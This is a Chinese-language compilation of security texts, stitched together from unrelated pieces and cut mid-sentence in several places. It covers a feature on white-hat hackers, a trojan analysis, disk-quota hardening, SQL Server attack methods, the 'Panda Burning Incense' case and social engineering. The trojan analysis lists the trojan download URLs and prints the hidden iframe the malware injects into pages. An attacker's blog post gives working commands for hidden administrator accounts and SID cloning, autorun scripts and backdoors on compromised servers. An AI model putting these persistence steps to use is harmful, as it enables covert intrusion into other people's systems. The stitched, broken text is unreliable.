Jeremy Poteet正在观看着他做安全工作的候选人网站上线。就在16分钟后，该网站遭到攻击。但是这个高度受关注的网站巧妙地规避了这些攻击，以及随之而来的其他攻击，因为Proteet已经预见到会发生此类攻击，并已经做出了对策。

他是怎么知道的呢？很简单，他是一个黑客，像黑客一样思考问题，并且知道黑客使用的工具——这是保护公司不被攻击的最有效方法。作为App防御的首席安全官，Poteet这一类黑客俗称为白帽子黑客或安全研究员——他们挖掘系统漏洞，指出哪里会有麻烦发生。黑帽子黑客是相反的一类——他们为了邪恶的目的企图获得进入系统和数据资料的权限。在过去，大多数黑客是为了好玩或是为了吹牛。

现在，黑帽子黑客在恶意软件业以数万美元的价格贩卖攻击代码，利用漏洞获取密码、银行网站信用及个人资料来进行身份窃取和金融诈骗。

学习像黑帽子黑客一样思考，知道他们寻找什么以及如何得到应该成为每个公司安全战略的基本部分。

根据“黑客暴光”一书的作者George Kurtz的说法，过去几年里黑客攻击的目标发生了戏剧性的变化。

“当我进入游戏…以前是这样，‘我们没有防火墙，我们有一个封包路由过滤器’，快速闪回到今天，你有非常互动的应用程序：Web2.0与后端数据库及周围所有潜在风险捆绑在一起”Foundstone的创始人Kurts说。 Foundstone是美国信息安全顾问服务与教育训练领导厂商，现在是McAfee的一个分公司，Kurtz担任McAfee企业在加里福尼亚的公司 Mission Viejo的高级副总裁。事实上，应用软件越来越引起黑客的注意。

根据Gartner和Symantec的研究，截至2006年6月接近90%的软件攻击是针对应用程序层。“只要开启了端口80，就可以不受限制的进入一个应用程序”Kurtz说。

应用级别的漏洞并不新鲜。2002年，Poteet赢得了第四界eWEEK’s OpenHack竞赛，在这个竞赛中参赛者被邀请攻击电子商务试验网站。Poteet那时已经攻击了一个捆绑于Oracle数据库应用版本的网站。

基本上，Poteet攻击的这个漏洞是一个可以让用户编辑个人资料的界面。

用户名域估计是不可编辑的。但只要前端接受了输入，同时WEB服务器从一个浏览器接收了数据，那么用户名域是不是可编辑的就不重要了——到了这一步，所有东西都可编辑了。

Poteet把用户名域中的名字改成"A Smith"，然后他就象一只蜘蛛等待潜逃一样伺机行动。只要一个叫做"A Smith"的用户名登陆了，他便发起突袭，迅速进入并获取用户A Smith的所有数据。

问题是，在Openhack期间大部分应用开发商不重视Poteet的做法。Poteet说他已经与很多公司协商过，重要的不是看到漏洞无处不在，而是在所有域的所有界面和所有应用程序中都存在这种易于攻击的漏洞。

而且我们谈论的不是小夫妻店—Poteet的大部分客户是财富500强公司，其中很多是金融机构。但是，即使是在这些金融领域的大型机构中—它们都是以在安全问题方面专业精通和经验丰富而闻名—这些数字领域的专家仍然留出了大量有名的安全漏洞，吸引攻击者像苍蝇追着蜜糖一样蜂拥而至。

骗我一次…

谈到安全问题只有一件事可以确定，就是人们一遍又一遍地犯着同样的错误。黑客因此得以存在。

一般的漏洞包括错误信息数据，它们可以用来进入系统，SQL注入，XSS(跨站点脚本)和J2EE应用程序中的进入控制(Java2平台，企业版本)。

黑客特别喜爱SQL注入：一个好的SQL注入将从你数据库表中得到数据。

如果攻击者得到用户查询中的编辑能力，他们就可以改变数据库中的数据。

在开放网络应用安全计划概述中，这些问题名列全球十大应用安全问题最频繁失误。也包括在提供错误信息的实用信息名单中。

例如这个错误信息："微软提供的适用于MS SQL Server数据库系统的OLE DB数据库驱动程序错误’80040e14′号， select语句中的字段’newsTBL.NEWS_ID’ 不合法，因为它没有包含在聚集函数中， 并且没有GROUP BY子句。

从以上信息中，一个潜在的攻击者会了解到该应用程序是使用OLE DB与数据库联系，它使用SQL服务器作为数据库，SQL指令会传送到数据库里叫做newsTBL的表。Rootkit技术的快速发展成为了为恶意代码机器增加利益的新趋势。

“我们在‘McAfee’s’的Avert实验室看到一些的rootkit技术简直不可思议，”Kurtz说“‘我们看到’以前没有做过的事情，完全按新的方法‘做’的事情，暗中窃取信息，并把它用于金融欺诈。从一个‘犯罪的’心理来看，观念从‘让我来找个漏洞’变成了‘让我来找个能让我安装网络自动代理程序的应用程序漏洞，用自动代理程序使它自动化下载网页、感染用户。”

安全研究人员正在密切关注着两项rootkit新技术的实战应用，他们担心新技术有一天会为自动代理程序产业贡献金钱：虚拟的rootkit和邪恶的超级监视者。

“我们知道坏人为了在系统中停留更长时间，在悄悄地寻找更多途径”Joe Telafici说， Joe Telafici是俄勒冈州Beaverton的McAfee公司的Avert运营中心副总裁。”在一台机器上隐蔽地停留越长时间，就能将网络自动代理程序或其他的东西租售越长时间。”

目前只在概念证明型代码中看到的无论是邪恶hypervisor技术还是虚拟rootkits，都能让恶意代码作者在一台机器上隐蔽地停留很长的时间。

一直以来，研究员对黑帽子将新技术运用于攻击中严阵以待；他们相信这只是时间问题，而不是会不会发生的问题。(6月27日，一组研究人员提出外国新rootkit技术可能无法被察觉出来，不过委员会对这个问题仍然没有得出结论。)

让它流血

Thomas Ptacek，Matasano公司的首席研究员兼创始人说，评估那些用来保护资产的产品的安全性不仅是程序开发员和系统架构师的应尽的责任；他们还应深入程序内部看是否有漏洞存在——和黑客做一样的事。”Ptacek还说“为了做到尽职调查，他们得要剥开应用程序的外衣深入其中”比如，剥离开 Microsoft’s Windows Vista，我们会看到微软在这个最新的操作系统中做出了被认为是最重大的安全问题改善。Vista的64位版本使现在黑客用的有些工具不能用了。

对于那些以为攻击登入点总在同一个地方，而向有安全漏洞的功能发起攻击的黑客来说，Vista的64位版本使之变的更加困难了。Vista还消除了向Windows核心注入编码的功能，来观察哪些函数正在被其他正在运行的程序所调用。

还有Vista的UAC（用户帐户控制），它将一些文件和注册表的键改向“沙坑”传送。恶意软件可以做出一些改变，但是这些改变会在进程停止或至少是不再感染其他用户时消失作用。

尽管如此，放心，这些新的安全控制还不会让恶意代码编写者卷铺盖回家。而且，安全研究员已预见到Vista的新安全文件实际上会促进攻击者推陈出新。

McAfee预计大约需要6个月的时间，一个遭受挫折的野心勃勃的恶意代码作者就会把他或她的注

分析：
File: wniapsvr.exe
Size: 24333 bytes
File Version: 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
MD5: E73C5073E03673880C62683BA24DB798
SHA1: 7A2496CBBD05F3B01D35C1DDC4A12E93D171DD9A
CRC32: 18621B7D

病毒运行后：
文件变化:
释放文件
C:\WINDOWS\system32\wniapsvr.exe

注册服务Visual VSA WEB

服务相关键值
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Type: 0×00000110
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Start: 0×00000002
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ErrorControl: 0×00000000
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ImagePath: "C:\WINDOWS\system32\wniapsvr.exe -Run"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\DisplayName: "Networ VSA"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ObjectName: "LocalSystem"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Description: "允许对TCP/IP上NetBios服务以及NetBT名称解析的支持。"

删除C:\WINDOWS\system32\verclsid.exe

启动IE连接网络 222.88.91.80:80下载木马
下载http://web.xxxxxxxxxx.com/web/123.txt到%programfiles%下面
读取里面的木马版本信息
下载木马
http://web.xxxxxxxxxx.com/soft/1.exe
http://web.xxxxxxxxxx.com/soft/2.exe
http://web.xxxxxxxxxx.com/soft/3.exe
http://web.xxxxxxxxxx.com/soft/4.exe
http://web.xxxxxxxxxx.com/soft/5.exe
http://web.xxxxxxxxxx.com/soft/6.exe
http://web.xxxxxxxxxx.com/soft/7.exe
http://web.xxxxxxxxxx.com/soft/8.exe
http://web.xxxxxxxxxx.com/soft/9.exe
http://web.xxxxxxxxxx.com/soft/a.exe
http://web.xxxxxxxxxx.com/soft/b.exe
http://web.xxxxxxxxxx.com/soft/c.exe
http://web.xxxxxxxxxx.com/soft/d.exe
http://web.xxxxxxxxxx.com/soft/e.exe
http://web.xxxxxxxxxx.com/soft/f.exe
http://web.xxxxxxxxxx.com/soft/g.exe
到%program files%下面 分别命名为pro1.exe~pro16.exe

木马植入完毕后
生成如下文件
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\dhapri.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\MsIMMs32.dll
C:\WINDOWS\system32\netsrvcs.dll
C:\WINDOWS\system32\nslookupi.exe
C:\WINDOWS\system32\ntsokele.exe
C:\WINDOWS\system32\nwizwmgjs.exe
C:\WINDOWS\system32\perefic.ini
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\windhcp.ocx
C:\WINDOWS\system32\wniapsvr.exe
C:\WINDOWS\AVPSrv.exe
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\MsIMMs32.exe
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\upxdnd.exe
C:\Program Files\Internet Explorer\PLUGINS\System64.Jmp
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys
C:\WINDOWS\system32\dhapri.dll

所有分区下生成hide.exe和autorun.inf E盘下面还生成sysauto.exe
sysauto.exe跟C:\Program Files\Internet Explorer\PLUGINS\System64.Jmp
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys有关 是盗号木马

hide.exe与C:\WINDOWS\system32\RemoteDbg.dll有关

值得一提的是C:\WINDOWS\system32\nslookupi.exe这个病毒
他感染所有分区的htm html asp 等网页文件
在其中加入<IFRAME SRC=http://mm.xxxxxx.com/abc.htm width=1 height=1 frameborder=0></IFRAME>的代码

sreng日志中相关项目如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><C:\WINDOWS\upxdnd.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<TIMHost><C:\WINDOWS\TIMHost.exe> []
<MsIMMs32><C:\WINDOWS\MsIMMs32.exe> []
<AVPSrv><C:\WINDOWS\AVPSrv.exe> []
<Microsoft Autorun4><C:\WINDOWS\system32\nwizwmgjs.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<AppInit_DLLs><dhapri.dll> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{12311A42-AC1B-158F-FD32-5674345F23A1}><C:\WINDOWS\system32\dhapri.dll> []
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:\Program Files\Internet Explorer\PLUGINS\System64.Sys> []
服务
[Remote Help Session Manager / Rasautol][Stopped/Auto Start]
<C:\WINDOWS\system32\ntsokele.exe><N/A>
[Networ VSA / Visual VSA WEB][Stopped/Auto Start]
<C:\WINDOWS\system32\wniapsvr.exe -Run><Microsoft Corporation>
进程
[PID: 1748 / Administrator][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\system32\dhapri.dll] [N/A, ]
[C:\Program Files\Internet Explorer\PLUGINS\System64.Sys] [N/A, ]
[C:\WINDOWS\system32\upxdnd.dll] [N/A, ]
[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]
[C:\WINDOWS\system32\AVPSrv.dll] [N/A, ]
[C:\WINDOWS\system32\MsIMMs32.dll] [N/A, ]
[C:\WINDOWS\system32\TIMHost.dll] [N/A, ]
[C:\WINDOWS\system32\nwizwmgjs.dll] [N/A, ]

清除方法：
首先把C:\WINDOWS\system32\dhapri.dll重命名为其他名称
然后重启进入安全模式下
打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><C:\WINDOWS\upxdnd.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<TIMHost><C:\WINDOWS\TIMHost.exe> []
<MsIMMs32><C:\WINDOWS\MsIMMs32.exe> []
<AVPSrv><C:\WINDOWS\AVPSrv.exe> []
<Microsoft Autorun4><C:\WINDOWS\system32\nwizwmgjs.exe> []

“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”，
选中以下项目，点“删除服务”，再点“设置”，在弹出

在大多数情况下黑客入侵远程系统必须把木马程序或后门程序上传到远程系统当中。如何才能切断黑客的这条后路呢？NTFS文件系统中的磁盘配额功能就能帮助用户轻松实现对磁盘使用空间的管理。

1.首先右击系统中一个NTFS分区，选择“属性”，可以打开“分区属性设置窗口”，选择其中的“配额”选项。首先勾上“启用配额管理”和“拒绝将磁盘空间给超过配额限制的用户”，这时所有的配额选项将变为可选状态。

2.接着选中“磁盘空间限制”选项，这时我们就可以在其中规定系统中用户使用磁盘空间的大小，如1KB.这样如果用户在分区中传入了一个大于1KB的文件，那么该文件将遭到系统拒绝，无法顺利地传入到该分区当中。

3.同理在“磁盘空间限制”选项下还有一个“警告级别”选项，如果设置了警告级别的文件大小，当用户在使用磁盘空间的过程中超出了警告级别的大小，系统将提示用户该文件超出了磁盘配额中的警告级别。

4.最后用户可以勾选上“用户超出配额限制时记录事件”和“用户超出警告等级时记录事件”两个选项，这样如果系统中有其他用户超出了分区的警告等级和配额限制，系统将把这些事件自动记录到系统日志当中，非常有利于管理员对系统分区空间的监控

5.当完成这些配置选项设置之后，点击窗口下的“确定”按钮，即可完成对磁盘配额功能的初步配置，这时用户可以惊奇地发现，原本还有很多剩余空间的分区，现在可用空间变得所剩无几。

6.这时用户已经无法向这个分区中写入大于配额的文件。并且这个配置对于系统中所有的用户生效，包括Administrators组中的用户。

7.但是如果配置对系统中所有用户生效的话，显然很不方便用户对系统的操作，而在磁盘配额功能中还提供了一个针对不同用户划分使用空间的功能。实现方法也非常简单。首先点击配额配置窗口中的“配额项”按钮，这时会弹出“分区配额项目”的窗口，点击窗口左上方的“配额”选项，再选择其中的“新建配额项”，这时会弹出一个选择用户的窗口，在其中填入或者选择系统中的一个用户名(如XieWei)，确定之后就会出现一个针对该用户使用磁盘空间限制的选项，而大家可以根据该用户在系统中的权限和使用情况，合理地为该用户指定使用空间，这样配置既不影响系统常规的操作，同时也加强了系统的安全性。

无论是使用手工试探还是使用安全测试工具，恶意攻击者总是使用各种诡计从你的防火墙内部和外部攻破你的SQL服务器系统。既然黑客在做这样的事情。你也需要实施同样的攻击来检验你的系统的安全实力。这是理所当然的。下面是黑客访问和攻破运行SQL服务器的系统的十种诡计。
　　1.通过互联网直接连接
　　这些连接可以用来攻击没有防火墙保护、全世界都可以看到和访问的SQL服务器。DShield公司的端口报告显示了有多少系统在那里等待遭受攻击。我不理解允许从互联网直接访问这种重要的服务器的理由是什么。但是，我在我的评估中仍发现了这种安全漏洞。我们都记得SQL Slammer蠕虫对那样多的有漏洞的SQL服务器系统造成的影响。而且，这些直接的攻击能够导致拒绝服务攻击、缓存溢出和其它攻击。
　　2.安全漏洞扫描
　　安全漏洞扫描通常可以基本的操作系统、网络应用程序或者数据库系统本身的弱点。从没有使用SQL安全补丁、互联网信息服务(IIS)设置弱点到SNMP(简单网络管理协议)漏洞等任何事情都能够被攻击者发现，并且导致数据库被攻破。这些坏蛋也需使用开源软件、自己制作的工具软件或者商业性工具软件。有些技术高手甚至能够在命令提示符下实施手工黑客攻击。为了节省时间，我建议使用商业性的安全漏洞评估工具，如Qualys公司的QualysGuard(用于普通扫描)、SPI Dynamics公司的WebInspect(用于网络应用程序扫描)和下一代安全软件公司的“NGSSquirrel for SQL Server”(用于数据库扫描)。这些工具软件很容易使用，提供了最广泛的评估，并且可以提供最佳的结果。图1显示了你可能发现的一些SQL注入安全漏洞。

图1:使用WebInspect发现的普通SQL注入安全漏洞。
　　3.列举SQL服务器解析服务
　　在UDP端口1434上运行，这能让你发现隐蔽的数据库实例和更深入地探查这个系统。Chip Andrews的“SQLPing v 2.5”是一个极好的工具，可用来查看SQL服务器系统并且确定版本编号。你的数据库实例即使不监听这个默认的端口，这个工具软件也能发挥作用。此外，当过分长的SQL服务器请求发送到UDP端口1434的广播地址的时候，会出现缓存溢出问题。
　　4.破解SA口令
　　攻击者还可以通过破解SA口令的方法进入SQL服务器数据库。遗憾的是，在许多情况下不需要破解口令，因为没有分配口令。因此，可以使用上面提到的一种小工具SQLPing。Application安全公司的AppDetective和NGS软件公司的NGSSQLCrack等商业性工具软件也有这种功能。
　　5.直接利用安全漏洞攻击
　　使用图1显示的Metasploit等工具软件可以直接实施攻击。这种软件的商业性软件“CANVAS”和“CORE IMPACT”等能够利用在正常的安全漏洞扫描过程中发现的安全漏洞实施攻击。这是非常有效的攻击手段，攻击者可利用这种手段突破系统、从事代码注入或者取得非经授权的命令行访问权限。

　　6.SQL注入
　　SQL注入攻击可以通过没有正确验证用户输入的前端网络应用程序实施。包括SQL指令在内的异常的SQL查询可以直接注入到网络URL(统一资源定位符)中，并且返回一些错误通知，执行一些指令等等。如果你有时间的话，这些攻击可以手工实施。我一旦发现一个服务器有一个潜在的SQL注入安全漏洞，我喜欢使用一种自动的工具深入研究这个漏洞。这些工具包括图3显示的SPI Dynamics公司的SQL注入器等。

图3:SPI Dynamics公司的SQL注入器自动实施SQL注入过程。
　　7.SQL盲注攻击
　　这些攻击以标准的SQL注入攻击相同的基本方式利用网络应用程序和后端SQL服务器的安全漏洞。最大的区别是攻击者收不到以错误通知形式从网络服务器发回的信息。这种攻击由于涉及到猜口令，速度要比标准的SQL注入攻击慢一些。在这种情况下，你需要一种比较好的工具。那就是图4显示的Absinthe工具。

图4:Absinthe工具在实施SQL盲注攻击测试。
　　8.对系统实施逆向工程
　　逆向工程的方法可以查找软件的安全漏洞和内存损坏弱点等漏洞。在利用软件安全漏洞方面，可以参考Greg Hoglund和Gary McGraw合著的“如何破解代码”一书，你可以发现有关逆向工程方法的一些讨论。
　　9.Google hacks
　　Google hacks利用Google搜索引擎不同寻常的力量搜出可公开访问的系统泄漏出来的SQL服务器的错误，如“Incorrect syntax near”(附近语法错误)。Johnny Long编写的“Google Hacking Database”数据库中一些Google的查询项目。(查看错误信息和包含口令的文件部分)。黑客能够使用Google找到口令、网络服务器中的安全漏洞、基本的操作系统、公开提供的程序以及其它能够用来攻破SQL服务器系统的东西。通过Google网站的“site:”操作符把这些查询结合在一起同场可以发现你想不到能够找到的东西。
　　10.熟读网站源代码
　　源代码还能够暴露可能导致SQL服务器被攻破的信息。特别是开发人员为了简化身份识别过程把SQL服务器身份识别信息存储在ASP脚本中的情况下更是如此。手工评估或者Google能够在一瞬间就发现这个信息。

病毒，已经不仅仅是病毒，已经成为了商业犯罪的辅助工具，此为黑手，所为黑道。

　　通过“江湖传言”得知,在一个庞大的犯罪链条中,处于利润最丰厚环节的“老板”远在上海,他可能通过比“熊猫烧香”隐蔽得多的病毒,或者是其他不为外人所知的手段,每个月攫取200万元的财富。

　　李俊还远非一个“完美”的罪犯，更大的“老板”可能通过比“熊猫烧香”隐蔽得多的病毒，每个月攫取200万元的财富。

　　舆论和李俊制造的电脑病毒一样厉害，从年前到年后，这个武汉新洲阳逻的25岁“男孩”蹲在湖北仙桃市第一看守所，外面是铺天盖地的关于他和他同伙被抓的报道。他剃光了头，觉得颜面尽失。他弱弱地说他不想再接受采访了，惭愧于自己让父母没有过好这个年。

　　在看守所他接受了太多的采访。这个时候的他，像他喜爱的熊猫一样，被推到公众的视线之下，不同的是，这并无荣光。

　　这是个要强的“男孩”，但他是个成年人。他用没长大的心态给中国的数百万台电脑制造了一场灾难，所以他被剃了光头，关在这里。在被抓之前，他爱 漂亮，网上有他戴着蛤蟆镜咧着嘴巴笑的靓照，头发蓬松，发型时尚。如果按照家乡亲友老师的说法，李俊还算一个乖孩子。但对那些只能从电脑死机和“熊猫作 揖”中感受李俊的万千网民来说，他却是个不折不扣的“刺儿头”。

　　绝大部分人所见过的李俊的照片，是他的光头照，目光呆滞、神情沮丧。而只有少数人才见过，警方在侦破案件过程中，从李俊的某个网上私人空间找到的蛤蟆镜照片。照片上，李俊笑得很惬意。

　　5位数QQ号码主

　　李俊并非魔头。他只是个普通的没有接受过高等教育的湖北青年。在湖北，中专和技校的数量是全国最多的。无数的乡村和城镇的父母将孩子送入这些职 业学校，期望用短一些的教育周期来完成送孩子走入社会的艰辛历程。李俊这个从小就很聪明的孩子不幸也因为这些原因放弃了读高中考大学的路，到父母所在的 “水泥系统”所属的技校读书。不幸的还有，李俊对这条道路缺乏兴趣，20岁之后，他就成了一个自由人—— 没有值钱的学历，没有“单位”，也就没有稳定的收入和相应的社会保障。

　　和这些不幸因素同时影响到李俊的还有，互联网在中国普通青年中的普及。不知道这个因素应该归于幸运，还是不幸?对于年轻的李俊来说，既然学校里 面学到的东西不足以满足他的求知欲——他可从小就喜欢拆装电子和机械小玩意儿——2001年左右，他开始着迷般地学习电脑和网络知识。网吧是他学习的场 所。

　　就像一个孩童闯入了枪械库。网上聊天、网络游戏这类玩意儿根本就无法满足李俊学习的“本能”，而当一个黑客，对于肯学习的李俊来说，已非难事。 互联网就是最好的老师，也是最好的实验室。从2003年起，李俊已经开始了编写病毒的疯狂“修炼”。2006年作乱于互联网的“熊猫烧香”病毒，不过是李 俊三年病毒编写历史中的集大成者，此前，他编写过“武汉男孩”系列病毒、“QQ尾巴”病毒，并已经知道如何用病毒牟利。

　　在李俊武汉住所搜出来的一沓机票显示了这一点。李俊供认说，这些机票是他去各地见网友产生的。机票上的时间大部分是2005年。这个时间在李俊 编写“熊猫烧香”之前，但他见各地网友目的是什么，目前还没有案卷能够显示这一点。可供猜想的是，他的这些飞行，对他后来的炫耀式犯罪也许有很重要的影 响。

　　QQ是李俊和网友们联络的重要工具。据说李俊的QQ号码是5位数的，这么短的号码，在QQ用户中，意味着“资深”或者“有路子”。无论是李俊， 还是王磊，抑或其他被抓嫌犯，QQ群是个好东西，他们一天都离不开。王磊他们所在的QQ群有近200 人，加入的方式是朋友介绍，由群主批准。这个群讨论的内容是黑客技术和“黑客经济”。当然，“黑客经济”他们不懂，但他们知道这东西“来钱”。

　　在提讯的警察面前，1986年出生的叶培新还显得一脸稚气，眼泪是他的一大半“交代”。他一再嗫嚅地问自己会判几年。作为与李俊同期被刑拘的6名嫌犯之一，叶培新年龄最小，尚是温州市一所大学的学生，他就是借助QQ群，逐步学会如何用病毒牟利的。

　　实际上，加上在大年初五被抓的涉嫌制作“熊猫烧香”变种“金猪报喜”的云南个旧人薛庆，归案的才7人。而通过QQ群向李俊直接或间接购买过病毒的，就不少于120人。在警方的一份档案中，记录着一长串下一步要侦缉和抓捕的嫌犯的网名。

　　通过群里面的交流，配合黑客论坛，有的人慢慢有了技术，有的人越来越会“忽悠”，还有的人越来越懂得如何用病毒“来钱”。在这个微型“江湖” 里，李俊(或是他的网名DAVE，或是小名小俊)慢慢有了自己的名气。李俊有自己的“定位”。在那并不完全成熟的心智的指引下，他懂得积攒实力，但积攒的 实力到了一定程度，他又忍不住要炫耀。这种炫耀让他名利双收，不过，也招来了警察，招致了法律的制裁。

　　炫耀式犯罪

　　李俊的同行说，李俊的病毒并不合常规。病毒应该“随风潜入夜，润物细无声”，让感染病毒的机器毫无征兆才是“王道”。但李俊的“熊猫烧香”之所 以出名，是因为这种病毒发作的一个特征，就是将电脑里面的可执行文件和超文本文件的图标更改，变成李俊喜欢的“熊猫烧香”模样。这等于是告诉用户，你的电 脑中毒了。

　　李俊的炫耀还表现在他通过病毒里面的编码和其他黑客打招呼。“武汉男孩”病毒的得名，源自于这个病毒留下了“武汉男孩”字样，这是李俊类似梅花 大盗的作案方式，传说中的梅花大盗作案后要在现场留下梅花印记。初出茅庐的李俊急于传达一个讯息：有一个武汉人出山了，有一个武汉人正在成长为一个职业黑 客。

　　长期没有稳定工作的李俊已经通过“武汉男孩”和“QQ尾巴”病毒取得过收入，否则他根本不能阔绰地坐飞机四处见网友。而见网友，应该有更大的利 益在里面。似乎可以猜想成这是李俊的一个“游学”计划，这个计划为李俊编写出传播性极强的“熊猫烧香” 病毒创造了条件。李俊交代说，他为自己的“熊猫烧香”病毒开价是1000元，但2005年之前他又是如何赚钱的，目前公安部门还在审讯之中。卖病毒只是李 俊们取得收入的途径之一，通过病毒控制大量“肉机”，然后将这些“肉机”卖给需要的人，更容易实现收入的规模化。

　　“肉机”者肉鸡也，是李俊们对中毒电脑的称呼。通过对“肉机”的控制，嫌犯们成批量窃取账号密码等有价值的信息，他们的邮箱里面放着成千上万的对其原本主人可能有重要意义的数据，而在他

本人喜欢东躲西藏，所以总结出了一些隐藏的方案，具体看情况定了。

那么一般进入一台服务器后隐藏自己的手段有：

1。superdoor克隆，但是有bug。榕哥的ca克隆，要依赖ipc，也不是很爽

2。创建count$这样的隐藏帐号，netuser看不到，但是在管理》用户里可以看到，而且在我得电脑属性》用户配置文件里显示未知帐号，而且在document and setting里，会有count$的文件夹，并不是特别好，我在3台左右机子上作了结果都被kill了。

3。写一个guest.vbs启动时创建一个帐号或者激活guest用户或者tsinternetuser用户，在注册表里的winlogon里导入键值（事先做好),让他开

机自运行guest.vbs，这样就创建了一个幽灵帐号。
或者导入在[HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor]
"AutoRun"="C:\\Program Files\\guest.vbs"
这样是关联到cmd，只要运行就创建。

4。像冰河那样关联到txt，exe，运行txt就运行我们的程序

5。在组策略里配置自运行项。

6。设置文件关联，重要运行记事本或者什么就激活vbs

7。种植hackdefender，hack’sdoor，winshell，武汉男生之类的后门，但是容易被查杀，如果没有改造几乎没有效果，如果不被杀，那就。。。嘿嘿！！

8。夹杂文件，把经常用到的文件替换成rar自解压文件，既包含原exe文件又运行自己的程序(就是winrar做的不被查杀的捆绑）运行后就重复3，4，5的步骤，谁便你了。

9。寻寻觅觅之间，发现hideadmin这个玩意好不错，要求有administrator权限，隐藏以$结尾的用户，帅呆了！命令行，管理界面，用户配置文件里都找不到他的身影，一个字，强！强到我搞了好半天都不知道怎么去除了，只有让他呆着吧！倒～接着教主也有一个工具，有异曲同工之妙。

10。替换服务，将telnet或者termsvc替换成别的服务或者建一个新的～

11。手工在注册表中克隆隐藏账号，网上流传的一个看似很爽的方法，但经本人的2000 server测试也许是不在域中的原因根本不存在domains或者account这个键值，所以也就无从找起了。
但还是详述一下:
Windows 2000和Windows NT里，默认管理员帐号的SID是固定的500（0x1f4），那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆，在这里我们选择的帐号是IUSR_MachineName (为了加强隐蔽性)。
cmd 下
regedit /e admin.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
将SID为500的管理员帐号的相关信息导出，然后编辑admin.reg文件，将admin.reg文件的第三行
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]

最后的’1F4′修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9，如果机器在最初安装的时候没有安装 IIS，而自己创建了帐号后再安装IIS就有可能不是这个值)，将Root.reg文件中的’1F4′修改为’3E9′后执行然后另外一个是你需要修改那个账号的值
regedit /e iusr.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9
将iusr.reg文件中“’V'=hex:0”开始一直到iusr.reg文件结束部分复制下来
然后替换掉adam.reg中同样位置的部分.
最后使用 regedit /s adam.reg 导入该Reg文件
然后运行 net user IUSR_MachineName password 修改IUSR_MachineName的密码

hehe,ok，大功告成！
现在IUSR_MachineName账号拥有了管理员的权限，但是你使用net.exe和管理工具中的用户管理都将看不到任何痕迹，即使你去察看所属于的组和用户，都和修改前没有任何区别。

大概就知道这么多了，各位如果有更好的方法不吝赐教。。。。。

from:ＯＤＡＹ的BLOG

物理攻击首先得有一定的实际基础，没有这个前提，一切都不能付诸实施。

目前网络网络中最常用的攻击手段主要有以下几种：
1、社会工程学攻击
2、物理攻击
3、暴力攻击
4、利用Unicode漏洞攻击
5、利用缓冲区溢出漏洞进行攻击等技术。
在今天这篇文章中我将结合实际，介绍一些常用的的攻击工具的使用以及部分工具的代码实现。
下面首先给大家介绍一下社会工程学攻击，社会工程是使用计谋和假情报去获得密码和其他敏感信息的科学，研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体，因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。
举个例子：一组高中学生曾经想要进入一个当地的公司的计算机网络，他们拟定了一个表格，调查看上去显得是无害的个人信息，例如所有秘书和行政人员和他们的配偶、孩子的名字，这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统，因为网络上的大多数人是使用宠物和他们配偶名字作为密码。
一、社会工程学攻击
目前社会工程学攻击主要包括两种方式：打电话请求密码和伪造E-mail
1、打电话请求密码
尽管不像前面讨论的策略那样聪明，打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员，经常通过这种简单的方法重新获得密码。
2、伪造E-mail
